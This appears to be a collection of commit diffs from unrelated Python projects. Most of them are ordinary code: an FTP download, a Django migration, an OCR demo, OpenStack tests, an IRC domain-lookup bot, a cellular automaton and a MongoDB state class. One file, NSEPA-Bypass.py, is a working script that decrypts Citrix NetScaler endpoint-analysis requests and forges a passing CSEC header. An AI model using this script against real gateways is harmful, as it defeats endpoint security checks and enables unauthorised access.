+# Copyright (c) 2014 ASMlover. All rights reserved.%0A#%0A# Redistribution and use in source and binary forms, with or without%0A# modification, are permitted provided that the following conditions%0A# are met:%0A#%0A# * Redistributions of source code must retain the above copyright%0A# notice, this list ofconditions and the following disclaimer.%0A#%0A# * Redistributions in binary form must reproduce the above copyright%0A# notice, this list of conditions and the following disclaimer in%0A# the documentation and/or other materialsprovided with the%0A# distribution.%0A#%0A# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS%0A# %22AS IS%22 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT%0A# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS%0A# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE%0A# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,%0A# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,%0A# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;%0A# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER%0A# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT%0A# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN%0A# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE%0A# POSSIBILITY OF SUCH DAMAGE.%0A#%0A#!/usr/bin/env python%0A# -*- encoding: utf-8 -*-%0A%0Aimport ftplib%0Aimport os%0Aimport socket%0A%0A%0AHOST = 'ftp.mozilla.org'%0ADIRN = 'pub/mozilla.org/webtools'%0AFILE = 'bugzilla-LATEST.tar.gz'%0A%0A%0A%0Adef main():%0A try:%0A f = ftplib.FTP(HOST)%0A except (socket.error, socket.gaierror), e:%0A print 'ERROR: cannot reach %22%25s%22' %25 HOST%0A return%0A print '*** Connected to host %22%25s%22' %25 HOST%0A%0A try:%0A f.login()%0A except ftplib.error_perm:%0A print 'ERROR: cannot login anonymously'%0A f.quit()%0A return%0A print '*** Logined in as %22anonymously%22'%0A%0A try:%0A f.cwd(DIRN)%0A except ftplib.error_perm:%0A print 'ERROR: cannot cd to %22%25s%22' %25 DIRN%0A f.quit()%0A return%0A print '*** Changed to %22%25s%22 folder' %25 DIRN%0A%0A try:%0A f.retrbinary('RETR %25s' %25 FILE, open(FILE, 'wb').write)%0A except ftplib.error_perm:%0A print 'ERROR: cannot read file %22%25s%22' %25 FILE%0A os.unlink(FILE)%0A else:%0A print '*** Downloaded %22%25s%22 to cwd' %25 FILE%0A f.quit()%0A return%0A%0A%0A%0Aif __name__ == '__main__':%0A main()%0A
|
|
d059fa531f46fe063e7811a17478fab6c913acb4
|
add migration file
|
sigmapiweb/apps/Scholarship/migrations/0006_course_coursesection_review.py
|
sigmapiweb/apps/Scholarship/migrations/0006_course_coursesection_review.py
|
Python
| 0.000001
|
@@ -0,0 +1,2381 @@
+# Generated by Django 3.1.6 on 2021-11-18 13:53%0A%0Aimport apps.Scholarship.models%0Aimport common.mixins%0Afrom django.conf import settings%0Aimport django.core.validators%0Afrom django.db import migrations, models%0Aimport django.db.models.deletion%0A%0A%0Aclass Migration(migrations.Migration):%0A%0A dependencies = %5B%0A migrations.swappable_dependency(settings.AUTH_USER_MODEL),%0A ('Scholarship', '0005_change_on_delete'),%0A %5D%0A%0A operations = %5B%0A migrations.CreateModel(%0A name='Course',%0A fields=%5B%0A ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),%0A ('catalog_code', models.CharField(max_length=10, unique=True, validators=%5Bdjango.core.validators.RegexValidator(regex='%5BA-Z%5D+%5B0-9%5D+')%5D)),%0A ('title', models.CharField(max_length=100)),%0A %5D,%0A bases=(common.mixins.ModelMixin, models.Model),%0A ),%0A migrations.CreateModel(%0A name='Review',%0A fields=%5B%0A ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),%0A ('stars', models.IntegerField(validators=%5Bapps.Scholarship.models.validate_stars%5D)),%0A ('text', models.CharField(max_length=1000)),%0A ('reviewer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),%0A %5D,%0A bases=(common.mixins.ModelMixin, models.Model),%0A ),%0A migrations.CreateModel(%0A name='CourseSection',%0A fields=%5B%0A ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),%0A ('term', models.CharField(choices=%5B('A', 'A'), ('B', 'B'), ('C', 'C'), ('D', 'D'), ('E', 'E'), ('S', 'S'), ('F', 'F')%5D, default='A', max_length=1)),%0A ('year', models.PositiveIntegerField(validators=%5Bdjango.core.validators.MaxValueValidator(99)%5D)),%0A ('professor', models.CharField(max_length=100)),%0A ('catalog_course', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Scholarship.course', to_field='catalog_code')),%0A ('participants', models.ManyToManyField(to=settings.AUTH_USER_MODEL)),%0A %5D,%0A bases=(common.mixins.ModelMixin, models.Model),%0A ),%0A %5D%0A
|
|
2085083fc842c03efae72bbf288804ddd67605b1
|
add list_comprehension
|
misc/list_comprehension.py
|
misc/list_comprehension.py
|
Python
| 0.000002
|
@@ -0,0 +1,76 @@
+#!/usr/bin/env python%0A%0As = %5B2*x for x in range(101) if x ** 2 %3E 3%5D%0A%0Aprint s%0A
|
|
9e60fd94ef801bab0e8e9a5956b5c00c911bd6ca
|
Create tesseract_example.py
|
home/kyleclinton/tesseract_example.py
|
home/kyleclinton/tesseract_example.py
|
Python
| 0.000006
|
@@ -0,0 +1,1882 @@
+################################################################%0A#%0A# tesseract_example.py%0A# Kyle J Clinton%0A#%0A# This is an example of the use of TesseractOcr to read text from an image%0A# it is using many of the services that are common to the InMoov project or %0A# MRL in general%0A#%0A################################################################%0A%0A### Start and Setup OpenCV%0Aopencv=Runtime.start(%22opencv%22,%22OpenCV%22)%0A%0Aopencv.captureFromResourceFile(%22http://192.168.1.130:8080/stream/video.mjpeg%22); %0A# This Grabber does not seem to set correctly inside of OpenCV !?!?!%0Aopencv.setFrameGrabberType(%22org.myrobotlab.opencv.MJpegFrameGrabber%22); %0A%0Aopencv.capture()%0A%0A### Start and Setup Tesseract (Not as a filter inside OpenCV)%0Atesseract = Runtime.createAndStart(%22tesseract%22,%22TesseractOcr%22)%0A%0A%0A### Start and Setup MarySpeech (You could switch out for your favorite TextToSpeech service) %0Amouth = Runtime.createAndStart(%22MarySpeech%22, %22MarySpeech%22)%0Amouth.setVoice(%22cmu-bdl-hsmm%22)%0A%0A### This is my little mod to the voice to make it specifically %22Junior's Voice%22%0Amouth.setAudioEffects(%22TractScaler(amount=1.4) + F0Add(f0Add=60.0) + Robot(amount=8.0) %22)%0A%0Adef readTextFromImage():%0A tesseract = Runtime.createAndStart(%22tesseract%22,%22TesseractOcr%22)%0A txtStr = tesseract.ocr(%2220170908_141852.jpg%22)%0A print(%22tess results: %22, txtStr) %0A mouth.speakBlocking(txtStr)%0A ## Not sure why I need to cleanup string for image name???%0A ####imgNameStr = opencv.recordSingleFrame()%0A ####imgNameStr = imgNameStr.replace(%22u'%22, %22%22).replace(%22'%22, %22%22)%0A ####print(%22captured image: %22, imgNameStr)%0A ####txtStr = tesseract.ocr(imgNameStr)%0A ## For Testing%0A #txtStr = tesseract.ocr(%2220170908_141852.jpg%22)%0A ## Cleanup of the string is required and this is very basic and needs to be more robust!%0A #txtStr = txtStr.replace(%22%5Cn%22, %22 %22).replace(%22:%22, %22 %22)%0A #print(%22tess results: %22, txtStr)%0A #mouth.speakBlocking(txtStr)%0A
|
|
058de6743532340611ac304c99bc7dd4ea474350
|
Create NSEPA-Bypass.py
|
NSEPA-Bypass.py
|
NSEPA-Bypass.py
|
Python
| 0
|
@@ -0,0 +1,2202 @@
+import sys%0Aimport base64%0Aimport hashlib%0A## Requires pyCrypto --%3E run 'pip install pycrypto'%0Afrom Crypto.Cipher import AES%0A%0A## Check that theres is enough info%0Aif (len(sys.argv) %3C 5):%0A print(%22You're not giving me enough to work with here:%5Cn%5Cn%22);%0A print(%22Usage:%5Cn%22);%0A print(%22python NSEPA-Bypass.py %5C%22NSC_EPAC Cookie Value%5C%22 %5C%22EPOCH Time from client%5C%22 %5C%22Value of the HOST: Header%5C%22 %5C%22Base64 encoded string from Server%5C%22%5Cn%5Cn%5Cn%22);%0A print(%22Example:%5Cn%22);%0A print(%22python NSEPA-Bypass.py %5C%22981005eef29ce34c80f535f9e78f4b4d%5C%22 %5C%221498797356%5C%22 %5C%22vpn.example.com%5C%22 %5C%22WWoNstbK760pVoPwPzHbs9pEf6Tj/iBk55gnHYwptPohBR0bKsiVVZmDN8J8530G4ISIFkRcC/1IaQSiOr8ouOYC84T5Hzbs2yH3Wq/KToo=%5C%22 %5Cn%5Cn%5Cn%22);%0A exit(1);%0A%0A## Set up the variables.%0Akey = %22%22%0Ahexcookie=%22%22%0Acookie = sys.argv%5B1%5D%0Aepoch = sys.argv%5B2%5D%0Ahost = sys.argv%5B3%5D%0AEPAcrypt64 = sys.argv%5B4%5D%0AEPAcrypt = base64.b64decode(EPAcrypt64)%0A%0A## Take the cookie string and load it as hex%0Afor i in range(0, len(cookie), 2):%0A hexcookie= hexcookie + chr( int(cookie%5Bi:i+2%5D,16))%0A%0A## Build the key source%0Akeystring = %22NSC_EPAC=%22 + cookie + %22%5Cr%5Cn%22 + epoch + %22%5Cr%5Cn%22 + host + %22%5Cr%5Cn%22 + hexcookie%0A%0A## Hash the key source%0Ahashedinput = hashlib.sha1(keystring).hexdigest()%0A%0A## load the hex of the ascii hash%0Afor i in range(0, len(hashedinput), 2):%0A key = key + chr( int(hashedinput%5Bi:i+2%5D,16))%0A%0A## Take the first 16 bytes of the key%0Akey = key%5B:16%5D%0Aprint %22%5Cn%22%0Aprint %22The key for this session is:%5Cn%22%0Aprint ' '.join(x.encode('hex') for x in key)%0Aprint %22%5Cn%22%0A%0A## Decryption if encrypted BASE64 Provided%0Adecryption_suite = AES.new(key, AES.MODE_CBC, hexcookie)%0Adecrypted = decryption_suite.decrypt(EPAcrypt).strip()%0Aprint %22The NetScaler Gateway EPA request: %5Cn%5Cr%22 + decrypted%0Aprint %22%5Cn%22%0A%0A%0A## Figure out how many '0's to respond with %0A## (semi-colon is the EPA request delimiter)%0ACSECitems = (decrypted.count(';'))%0A%0A%0A#Add PKCS5 Padding (string to be encrypted must be a multiple of 16 bytes)%0Apadding=16-(decrypted.count(';'))%0Aresponse = (chr(48)*CSECitems)+(chr(padding)*padding)%0A%0A## Encryption%0Aencryption_suite = AES.new(key, AES.MODE_CBC, hexcookie)%0Aprint %22Replace your current CSEC header with: %5CnCSEC: %22 + base64.b64encode(encryption_suite.encrypt(response))%0Aprint %22%5Cn%22%0A
|
|
f7463e81817783cdb3fef3af1b1f2ec68a09cfe8
|
Fix typo.
|
modularodm/fields/field.py
|
modularodm/fields/field.py
|
import weakref
import warnings
import copy
from modularodm import exceptions
from modularodm.query.querydialect import DefaultQueryDialect as Q
from .lists import List
def print_arg(arg):
if isinstance(arg, basestring):
return '"' + arg + '"'
return arg
class Field(object):
default = None
base_class = None
_list_class = List
mutable = False
lazy_default = True
_uniform_translator = True
def __repr__(self):
return '{cls}({kwargs})'.format(
cls=self.__class__.__name__,
kwargs=', '.join('{}={}'.format(key, print_arg(val)) for key, val in self._kwargs.items())
)
def subscribe(self, sender=None):
pass
def _to_comparable(self):
return {
k : v
for k, v in self.__dict__.items()
if k not in ['data', '_translators', '_schema_class']
}
def __eq__(self, other):
return self._to_comparable() == other._to_comparable()
def __ne__(self, other):
return not self.__eq__(other)
def _prepare_validators(self, _validate):
if hasattr(_validate, '__iter__'):
# List of callable validators
validate = []
for validator in _validate:
if hasattr(validator, '__call__'):
validate.append(validator)
else:
raise TypeError('Validator lists must be lists of callables.')
elif hasattr(_validate, '__call__'):
# Single callable validator
validate = _validate
elif type(_validate) == bool:
# Boolean validator
validate = _validate
else:
# Invalid validator type
raise TypeError('Validators must be callables, lists of callables, or booleans.')
return _validate, validate
def __init__(self, *args, **kwargs):
self._args = args
self._kwargs = kwargs
self._translators = {}
# Pointer to containing ListField
# Set in StoredObject.ObjectMeta
self._list_container = None
self.data = weakref.WeakKeyDictionary()
self._validate, self.validate = \
self._prepare_validators(kwargs.get('validate', False))
self._default = kwargs.get('default', self.default)
self._is_primary = kwargs.get('primary', False)
self._list = kwargs.get('list', False)
self._required = kwargs.get('required', False)
self._unique = kwargs.get('unique', False)
self._editable = kwargs.get('editable', True)
self._index = kwargs.get('index', self._is_primary)
self._is_foreign = False
# Fields added by ``ObjectMeta``
self._field_name = None
def do_validate(self, value, obj):
# Check if required
if value is None:
if getattr(self, '_required', None):
raise exceptions.ValidationError('Value <{0}> is required.'.format(self._field_name))
return True
# Check if unique
if value is not None and self._unique:
unique_query = Q(self._field_name, 'eq', value)
# If object has primary key, don't crash if unique value is
# already associated with its key
if obj._is_loaded:
unique_query = unique_query & Q(obj._primary_name, 'ne', obj._primary_key)
if obj.find(unique_query).limit(1).count():
raise exceptions.ValidationValueError('Value must be unique')
# Field-level validation
cls = self.__class__
if hasattr(cls, 'validate') and \
self.validate != False:
cls.validate(value)
# Schema-level validation
if self._validate and hasattr(self, 'validate'):
if hasattr(self.validate, '__iter__'):
for validator in self.validate:
validator(value)
elif hasattr(self.validate, '__call__'):
self.validate(value)
# Success
return True
def _gen_default(self):
if callable(self._default):
return self._default()
return copy.deepcopy(self._default)
def _get_translate_func(self, translator, direction):
try:
return self._translators[(translator, direction)]
except KeyError:
method_name = '%s_%s' % (direction, self.data_type.__name__)
default_name = '%s_default' % (direction,)
try:
method = getattr(translator, method_name)
except AttributeError:
method = getattr(translator, default_name)
self._translators[(translator, direction)] = method
return method
def to_storage(self, value, translator=None):
translator = translator or self._schema_class._translator
if value is None:
return translator.null_value
method = self._get_translate_func(translator, 'to')
value = value if method is None else method(value)
if self.mutable:
return copy.deepcopy(value)
return value
def from_storage(self, value, translator=None):
translator = translator or self._schema_class._translator
if value == translator.null_value:
return None
method = self._get_translate_func(translator, 'from')
value = value if method is None else method(value)
if self.mutable:
return copy.deepcopy(value)
return value
def _pre_set(self, instance, safe=False):
if not self._editable and not safe:
raise AttributeError('Field cannot be edited.')
if instance._detached:
warnings.warn('Accessing a detached record.')
def __set__(self, instance, value, safe=False, literal=False):
self._pre_set(instance, safe=safe)
if self.mutable:
data = copy.deepcopy(value)
self.data[instance] = value
def _touch(self, instance):
# Reload if dirty
if instance._dirty:
instance._dirty = False
instance.reload()
# Impute default and return
try:
self.data[instance]
except KeyError:
self.data[instance] = self._gen_default()
def __get__(self, instance, owner, check_dirty=True):
# Warn if detached
if instance._detached:
warnings.warn('Accessing a detached record.')
# Reload if dirty
self._touch(instance)
# Impute default and return
try:
return self.data[instance]
except KeyError:
default = self._gen_default()
self.data[instance] = default
return default
def _get_underlying_data(self, instance):
"""Return data from raw data store, rather than overridden
__get__ methods. Should NOT be overwritten.
"""
self._touch(instance)
return self.data.get(instance, None)
def __delete__(self, instance):
self.data.pop(instance, None)
|
Python
| 0.001604
|
@@ -5934,20 +5934,21 @@
-data
+value
= copy.
|
665476df5f23bdd781054c1accd8c2e700087039
|
update routing number to pass checksum
|
tests/test_bankaccount.py
|
tests/test_bankaccount.py
|
import unittest
import lob
# Setting the API key
lob.api_key = 'test_0dc8d51e0acffcb1880e0f19c79b2f5b0cc'
class BankAccountFunctions(unittest.TestCase):
def setUp(self):
lob.api_key = 'test_0dc8d51e0acffcb1880e0f19c79b2f5b0cc'
self.addr = lob.Address.list(count=1).data[0]
def test_list_bankAccounts(self):
bankAccounts = lob.BankAccount.list()
self.assertTrue(isinstance(bankAccounts.data[0], lob.BankAccount))
self.assertEqual(bankAccounts.object, 'list')
def test_list_bankAccounts_limit(self):
bankAccounts = lob.BankAccount.list(count=2)
self.assertTrue(isinstance(bankAccounts.data[0], lob.BankAccount))
self.assertEqual(len(bankAccounts.data), 2)
def test_list_bankAccounts_fail(self):
self.assertRaises(lob.error.InvalidRequestError, lob.BankAccount.list, count=1000)
def test_create_bankAccount_fail(self):
self.assertRaises(lob.error.InvalidRequestError, lob.BankAccount.create)
def test_create_bankAccount(self):
bankAccount = lob.BankAccount.create(
routing_number='123456789',
account_number='123456789',
bank_address=self.addr.id,
account_address=self.addr.id
)
self.assertTrue(isinstance(bankAccount, lob.BankAccount))
self.assertEqual(bankAccount.bank_address.id, self.addr.id)
def test_create_bankAccount_lob_obj(self):
bankAccount = lob.BankAccount.create(
routing_number='123456789',
account_number='123456789',
bank_address=self.addr,
account_address=self.addr
)
self.assertTrue(isinstance(bankAccount, lob.BankAccount))
self.assertEqual(bankAccount.bank_address.id, self.addr.id)
def test_create_bankAccount_inline(self):
bankAccount = lob.BankAccount.create(
routing_number='123456789',
account_number='123456789',
bank_address= {
'name': 'Lob1',
'address_line1': '185 Berry Street',
'address_line2': 'Suite 1510',
'address_city': 'San Francisco',
'address_zip': '94107',
'address_state': 'CA'
},
account_address= {
'name': 'Lob2',
'address_line1': '185 Berry Street',
'address_line2': 'Suite 1510',
'address_city': 'San Francisco',
'address_zip': '94107',
'address_state': 'CA'
}
)
self.assertTrue(isinstance(bankAccount, lob.BankAccount))
self.assertEquals(bankAccount.bank_address.name, 'Lob1')
self.assertEquals(bankAccount.account_address.name, 'Lob2')
def test_retrieve_bankAccount(self):
bankAccount = lob.BankAccount.retrieve(id=lob.BankAccount.list().data[0].id)
self.assertTrue(isinstance(bankAccount, lob.BankAccount))
def test_retrieve_bankAccount_fail(self):
self.assertRaises(lob.error.InvalidRequestError, lob.BankAccount.retrieve, id='test')
def test_delete_bankAccount(self):
ba = lob.BankAccount.list().data[0].id
delBa = lob.BankAccount.delete(id=ba)
self.assertEqual(ba, delBa.id)
|
Python
| 0
|
@@ -1095,39 +1095,39 @@
uting_number='12
-3456789
+2100024
',%0A a
@@ -1493,39 +1493,39 @@
uting_number='12
-3456789
+2100024
',%0A a
@@ -1884,39 +1884,39 @@
uting_number='12
-3456789
+2100024
',%0A a
|
b3a1f84fb6f28598595f00bdb01d789051999cb9
|
Update 2016-09-19 11h20
|
GUI_Tkinter_Demo.py
|
GUI_Tkinter_Demo.py
|
Python
| 0
|
@@ -0,0 +1,242 @@
+#!/usr/bin/python%0A%0Aimport Tkinter%0Aimport tkMessageBox%0A%0Atop = Tkinter.Tk()%0A%0Adef helloCallBack():%0A tkMessageBox.showinfo(%22Hello Python%22, %22Hello World%22)%0A%0AB = Tkinter.Button(top, text=%22Hello%22, command = helloCallBack)%0A%0AB.pack()%0Atop.mainloop()
|
|
e397d400a81466b22ae735f60f5a239ca4b7d653
|
create domain lookup module
|
domain.py
|
domain.py
|
Python
| 0
|
@@ -0,0 +1,2175 @@
+# domain.py%0A# Look up a domain's availability%0A%0A# Copyright 2015 Jason Owen %3Cjason.a.owen@gmail.com%3E%0A#%0A# This program is free software: you can redistribute it and/or modify%0A# it under the terms of the GNU Affero General Public License as published by%0A# the Free Software Foundation, either version 3 of the License, or%0A# (at your option) any later version.%0A#%0A# This program is distributed in the hope that it will be useful,%0A# but WITHOUT ANY WARRANTY; without even the implied warranty of%0A# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the%0A# GNU Affero General Public License for more details.%0A#%0A# You should have received a copy of the GNU Affero General Public License%0A# along with this program. If not, see %3Chttp://www.gnu.org/licenses/%3E.%0A%0Aimport datetime%0Aimport xmlrpclib%0Afrom twisted.internet import reactor%0A%0Adef repeatLookup(handler, client, channel, domain):%0A handler.doLookup(client, channel, domain)%0A%0Aclass DomainHandler:%0A def __init__(self, args):%0A self.apiKey = args%5B%22apiKey%22%5D%0A self.api = xmlrpclib.ServerProxy('https://rpc.gandi.net/xmlrpc/')%0A%0A def channelMessage(self, client, channel, name, message):%0A if message.lower().find(%22!domain%22) == 0:%0A domain = message.split(' ')%5B1%5D.lower()%0A self.doLookup(client, channel, domain)%0A return True%0A return False%0A%0A def doLookup(self, client, channel, domain):%0A self.log(client, %22looking up domain: %25s%22 %25 (domain,))%0A result = self.api.domain.available(self.apiKey, %5Bdomain%5D)%0A self.log(client, %22Got result: %25s%22 %25 (result,))%0A self.printOrCallback(client, channel, domain, result)%0A%0A def printOrCallback(self, client, channel, domain, result):%0A if (result%5Bdomain%5D == 'pending'):%0A self.log(client, %22Scheduling callback for domain %25s%22 %25 (domain,))%0A reactor.callLater(1, repeatLookup, self, client, channel, domain)%0A else:%0A self.log(client, %22Domain %25s is %25s%22 %25 (domain, result%5Bdomain%5D,))%0A client.say(channel, %22The domain %25s is %25s.%22 %25 (domain, result%5Bdomain%5D,))%0A%0A def log(self, client, message):%0A print %22%25s %25s: %25s%22 %25 (client.nickname, self.now(), message,)%0A def now(self):%0A return datetime.datetime.now().strftime(%22%25Y-%25m-%25d %25H:%25M%22)%0A
|
|
dda3ce9c56967dc6069b61f16feed2932e24ea14
|
test = input ("CPF: ") cpf = test[:3] + "." + test[3:6] + "." + test[6:9] + "-" + test[9:] print(cpf)
|
Python/FormatCpf.py
|
Python/FormatCpf.py
|
Python
| 0.999999
|
@@ -0,0 +1,147 @@
+test = input (%22CPF: %22) %0Acpf = test%5B:3%5D + %22.%22 + test%5B3:6%5D + %22.%22 + test%5B6:9%5D + %22-%22 + test%5B9:%5D%0Aprint(cpf)%0A%0A#https://pt.stackoverflow.com/q/237371/101%0A
|
|
f27241b5409ec00568efa1752d5eeb71516b16bd
|
Add cellular.py
|
cellular.py
|
cellular.py
|
Python
| 0.00017
|
@@ -0,0 +1,941 @@
+import random%0A%0Aclass TotalisticCellularAutomaton:%0A def __init__(self):%0A self.n_cells = 200%0A self.n_states = 5%0A self.symbols = ' .oO0'%0A self.radius = 1%0A self.cells = %5Brandom.randrange(0, self.n_states) for _ in range(self.n_cells)%5D%0A%0A n_rules = (2*self.radius + 1) * (self.n_states - 1)%0A self.rules = %5B0%5D + %5Brandom.randrange(0, self.n_states) for _ in range(n_rules)%5D%0A%0A%0A def neighbor_sum(self, pos):%0A return sum(self.cells%5B(pos+i)%25self.n_cells%5D for i in range(-self.radius, self.radius+1))%0A %0A def next_gen(self):%0A self.cells = %5Bself.rules%5Bself.neighbor_sum(i)%5D for i in range(self.n_cells)%5D%0A%0A def print_gen(self):%0A print(''.join(self.symbols%5Bstate%5D for state in self.cells))%0A%0Adef main():%0A ca = TotalisticCellularAutomaton()%0A%0A print(ca.rules)%0A while True:%0A ca.print_gen()%0A ca.next_gen()%0A%0A%0Aif __name__ == '__main__':%0A main()%0A%0A
|
|
7a1a59e5bb5a64dbeb91abdcac31dd0c8803c27d
|
Functional tests for security group rule
|
functional/tests/compute/v2/test_security_group_rule.py
|
functional/tests/compute/v2/test_security_group_rule.py
|
Python
| 0.998997
|
@@ -0,0 +1,2375 @@
+# Licensed under the Apache License, Version 2.0 (the %22License%22); you may%0A# not use this file except in compliance with the License. You may obtain%0A# a copy of the License at%0A#%0A# http://www.apache.org/licenses/LICENSE-2.0%0A#%0A# Unless required by applicable law or agreed to in writing, software%0A# distributed under the License is distributed on an %22AS IS%22 BASIS, WITHOUT%0A# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the%0A# License for the specific language governing permissions and limitations%0A# under the License.%0A%0Aimport uuid%0A%0Afrom functional.common import test%0A%0A%0Aclass SecurityGroupRuleTests(test.TestCase):%0A %22%22%22Functional tests for security group rule. %22%22%22%0A SECURITY_GROUP_NAME = uuid.uuid4().hex%0A SECURITY_GROUP_RULE_ID = None%0A NAME_FIELD = %5B'name'%5D%0A ID_FIELD = %5B'id'%5D%0A ID_HEADER = %5B'ID'%5D%0A%0A @classmethod%0A def setUpClass(cls):%0A # Create the security group to hold the rule.%0A opts = cls.get_show_opts(cls.NAME_FIELD)%0A raw_output = cls.openstack('security group create ' +%0A cls.SECURITY_GROUP_NAME +%0A opts)%0A expected = cls.SECURITY_GROUP_NAME + '%5Cn'%0A cls.assertOutput(expected, raw_output)%0A%0A # Create the security group rule.%0A opts = cls.get_show_opts(cls.ID_FIELD)%0A raw_output = cls.openstack('security group rule create ' +%0A cls.SECURITY_GROUP_NAME +%0A ' --proto tcp --dst-port 80:80' +%0A opts)%0A cls.SECURITY_GROUP_RULE_ID = raw_output.strip('%5Cn')%0A%0A @classmethod%0A def tearDownClass(cls):%0A raw_output = cls.openstack('security group rule delete ' +%0A cls.SECURITY_GROUP_RULE_ID)%0A cls.assertOutput('', raw_output)%0A%0A raw_output = cls.openstack('security group delete ' +%0A cls.SECURITY_GROUP_NAME)%0A cls.assertOutput('', raw_output)%0A%0A def test_security_group_rule_list(self):%0A opts = self.get_list_opts(self.ID_HEADER)%0A raw_output = self.openstack('security group rule list ' +%0A self.SECURITY_GROUP_NAME +%0A opts)%0A self.assertIn(self.SECURITY_GROUP_RULE_ID, raw_output)%0A
|
|
03d5fb46c877d176ed710a8d27b5ad7af699dc52
|
add Lubebbers example
|
pylayers/antprop/tests/Diffraction-Luebbers.py
|
pylayers/antprop/tests/Diffraction-Luebbers.py
|
Python
| 0
|
@@ -0,0 +1,391 @@
+%0A# coding: utf-8%0A%0A# In%5B1%5D:%0A%0Afrom pylayers.simul.link import *%0A%0A%0A# In%5B2%5D:%0A%0ADL=DLink(L=Layout('Luebbers.ini'),graph='tvi')%0A%0A%0A# In%5B3%5D:%0A%0A# get_ipython().magic(u'matplotlib inline')%0A# DL.L.showG('i')%0A%0A%0A# In%5B7%5D:%0A%0ADL.a = np.array((%5B37.5,6.2,2.%5D))%0ADL.b = np.array((%5B13,30,2.%5D))%0ADL.fGHz=np.array((%5B0.9,1.0%5D))%0A%0A%0A# In%5B8%5D:%0A%0Aplt.ion()%0A%0A# In%5B9%5D:%0A%0ADL.eval(diffraction=True)%0A%0A%0A# In%5B10%5D:%0A%0ADL.R%0A%0A%0A# In%5B %5D:%0A%0A%0A%0A
|
|
8fb25066deee46a22562be8e416556749678eb0b
|
remove printout
|
bihar/utils.py
|
bihar/utils.py
|
from operator import attrgetter
from django.utils.translation import ugettext_noop
from corehq.apps.groups.models import Group
ASHA_ROLE = ugettext_noop('ASHA')
AWW_ROLE = ugettext_noop('AWW')
def get_team_members(group):
"""
Get any commcare users that are either "asha" or "aww".
"""
users = group.get_users(only_commcare=True)
def is_team_member(user):
role = user.user_data.get('role', '')
return role == ASHA_ROLE or role == AWW_ROLE
return sorted([u for u in users if is_team_member(u)],
key=lambda u: u.user_data['role'])
def get_all_owner_ids(user_ids):
all_group_ids = [
row['id']
for row in Group.get_db().view(
'groups/by_user',
keys=user_ids,
include_docs=False
)
]
return set(user_ids).union(set(all_group_ids))
def get_all_owner_ids_from_group(group):
return get_all_owner_ids([user.get_id for user in get_team_members(group)])
def get_calculation(owner_ids, slug):
from bihar.models import CareBiharFluff
r = CareBiharFluff.aggregate_results(slug, (
['care-bihar', owner_id] for owner_id in owner_ids
), reduce=True)
num = r.get('numerator')
total = r.get('total')
r = CareBiharFluff.aggregate_results(slug, (
['care-bihar', owner_id] for owner_id in owner_ids
), reduce=False)
num_cases = ', '.join(r.get('numerator', ()))
total_cases = ', '.join(r.get('total', ()))
return num or '', total, num_cases, total_cases
def get_all_calculations(owner_ids):
from bihar.reports.indicators.indicators import IndicatorConfig, INDICATOR_SETS
config = IndicatorConfig(INDICATOR_SETS)
for indicator_set in config.indicator_sets:
print indicator_set.name
for indicator in indicator_set.get_indicators():
slug = indicator.slug
yield (indicator.name,) + get_calculation(owner_ids, slug)
def get_groups_for_group(group):
"""This is a helper function only called locally"""
owner_ids = list(get_all_owner_ids_from_group(group))
db = Group.get_db()
rows = db.view('_all_docs', keys=owner_ids, include_docs=True)
groups = []
for row in rows:
doc = row['doc']
if doc['doc_type'] == 'Group':
groups.append(Group.wrap(doc))
groups.sort(key=attrgetter('name'))
return groups
|
Python
| 0.000006
|
@@ -1783,41 +1783,8 @@
ts:%0A
- print indicator_set.name%0A
|
1873d42095b6d56f9fa0019a9658b250c39a3a23
|
Reverse the logic
|
mongodb_consistent_backup/State.py
|
mongodb_consistent_backup/State.py
|
import logging
import os
import platform
from bson import BSON, decode_all
from time import time
from mongodb_consistent_backup.Common import Lock
from mongodb_consistent_backup.Errors import OperationError
class StateBase(object):
def __init__(self, base_dir, config, filename="meta.bson", state_version=1, meta_name="mongodb-consistent-backup_META"):
self.meta_name = meta_name
self.state_dir = os.path.join(base_dir, self.meta_name)
self.state_lock = os.path.join(base_dir, "%s.lock" % self.meta_name)
self.state_file = os.path.join(self.state_dir, filename)
self.state = {
"name": config.backup.name,
"path": base_dir,
"state_version": state_version
}
self.lock = Lock(self.state_lock, False)
if not os.path.isdir(self.state_dir):
# try recursive first, fallback to regular mkdir
try:
os.makedirs(self.state_dir)
except:
try:
os.mkdir(self.state_dir)
except Exception, e:
raise OperationError(e)
def merge(self, new, old):
merged = old.copy()
merged.update(new)
return merged
def load(self, load_one=False):
f = None
try:
f = open(self.state_file, "r")
data = decode_all(f.read())
if load_one and len(data) > 0:
return data[0]
return data
except Exception, e:
raise e
finally:
if f:
f.close()
def write(self, do_merge=False):
f = None
try:
self.lock.acquire()
if do_merge and os.path.isfile(self.state_file):
curr = self.load(True)
data = self.merge(self.state, curr)
f = open(self.state_file, 'w+')
logging.debug("Writing %s state file: %s" % (self.__class__.__name__, self.state_file))
self.state['updated_at'] = int(time())
f.write(BSON.encode(self.state))
finally:
if f:
f.close()
self.lock.release()
class StateBaseReplset(StateBase):
def __init__(self, base_dir, config, backup_time, set_name, filename):
StateBase.__init__(self, base_dir, config, filename)
self.state['backup'] = True
self.state['backup_name'] = backup_time
